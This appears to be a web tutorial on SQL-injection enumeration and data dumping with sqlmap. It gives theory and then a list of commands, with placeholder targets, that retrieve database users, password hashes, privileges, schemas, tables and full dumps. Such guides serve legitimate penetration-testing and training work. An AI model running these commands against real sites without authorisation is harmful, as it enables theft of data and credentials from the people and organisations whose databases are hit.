Enumeration & Dumping

Context

This guide details the offensive technique of database enumeration and data dumping using SQL injection, specifically with sqlmap. Through this process, attackers identify and extract database structures and contents from vulnerable web applications. Assumed knowledge includes understanding of database schemas, writing SQL queries, and crafting HTTP requests.

Theory

Database Enumeration with SQL Injection

Database enumeration is the process of identifying database structures and entities through SQL injection. By exploiting poorly secured SQL queries that interact with user inputs, attackers can inject malicious SQL code to extract information such as database metadata, table structures, and user privileges.

Sqlmap Enumeration Capabilities

Sqlmap is a powerful open-source tool that automates the detection and exploitation of SQL injection flaws, facilitating database enumeration. It leverages SQL injection to systematically gather database metadata and data without requiring extensive manual interventions. Sqlmap's capabilities cover a wide range of enumeration tasks, making it indispensable for offensive operations targeting databases.

Data Dumping Techniques

Data dumping refers to extracting and saving database contents to a local machine. Using sqlmap, attackers can perform comprehensive data exfiltration, retrieving entire tables or databases efficiently. This technique is crucial in offensive cybersecurity for obtaining valuable information from compromised systems.

Practice

Enumerate Current User

Use the following command to identify the current database user.

sqlmap -u <URL> --current-user

Outcome: The current database user executing queries is identified.

Check DBA Status

Determine if the current user has DBA privileges with this command:

sqlmap -u <URL> --is-dba

Outcome: The DBA status of the current user is determined, which can lead to privilege escalation.

Retrieve Hostname

To get the database server's hostname, execute:

sqlmap -u <URL> --hostname

Outcome: The hostname of the database server is retrieved, providing further network insights.

Enumerate Database Users

List all database users with the following command:

sqlmap -u <URL> --users

Outcome: Database users are enumerated, revealing potential targets and accounts.

Dump User Passwords

Extract hashed passwords of database users using:

sqlmap -u <URL> --passwords

Outcome: Database user passwords are dumped, aiding in credential extraction activities.

Enumerate User Privileges

Uncover privileges for each database user by running:

sqlmap -u <URL> --privileges

Outcome: User privileges are enumerated, showcasing the potential access level of each user.

Enumerate Databases

Use this command to list all databases on the server:

sqlmap -u <URL> --dbs

Outcome: Databases are enumerated, giving a high-level view of the server's data assets.

Enumerate Tables

To list tables in a specific database, use:

sqlmap -u <URL> -D <database> --tables

Outcome: Tables within the specified database are identified.

Enumerate Columns

Identify columns in a specific table with:

sqlmap -u <URL> -D <database> -T <table> --columns

Outcome: Columns within the specified table are listed, aiding targeted data extraction.

Dump Table Data

Extract all data from a specific table using this command:

sqlmap -u <URL> -D <database> -T <table> --dump

Outcome: Data from the specified table is successfully dumped.

Full Database Dump

For extracting all data from all databases, execute:

sqlmap -u <URL> --dump-all

Outcome: All database data is dumped, providing full access to the stored information.

Enumerate Database Schema

Retrieve the database schema with:

sqlmap -u <URL> --schema

Outcome: The database schema is enumerated, revealing structural layout.

Count Records in Table

Count records in a specific table using:

sqlmap -u <URL> -D <database> -T <table> --count

Outcome: The record count in the specified table is retrieved, indicating the size of data present.

Search for Specific Data

Search for specific data in a column with:

sqlmap -u <URL> --search -C <column> -T <table> -D <database>

Outcome: Specific data is searched and retrieved according to query criteria.

Use Pivot Column

Leverage a pivot column for data extraction with:

sqlmap -u <URL> --pivot-column=<column>

Outcome: Data is extracted using the pivot column, optimizing retrieval processes.

Exclude System Databases

Exclude system databases from enumeration by running:

sqlmap -u <URL> --exclude-sysdbs

Outcome: System databases are ignored during enumeration, focusing the attack on user-created databases only.

Tools

  • sqlmap

Sqlmap streamlines SQL injection identification and exploitation, offering a robust suite of features for automated database enumeration and data dumping.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.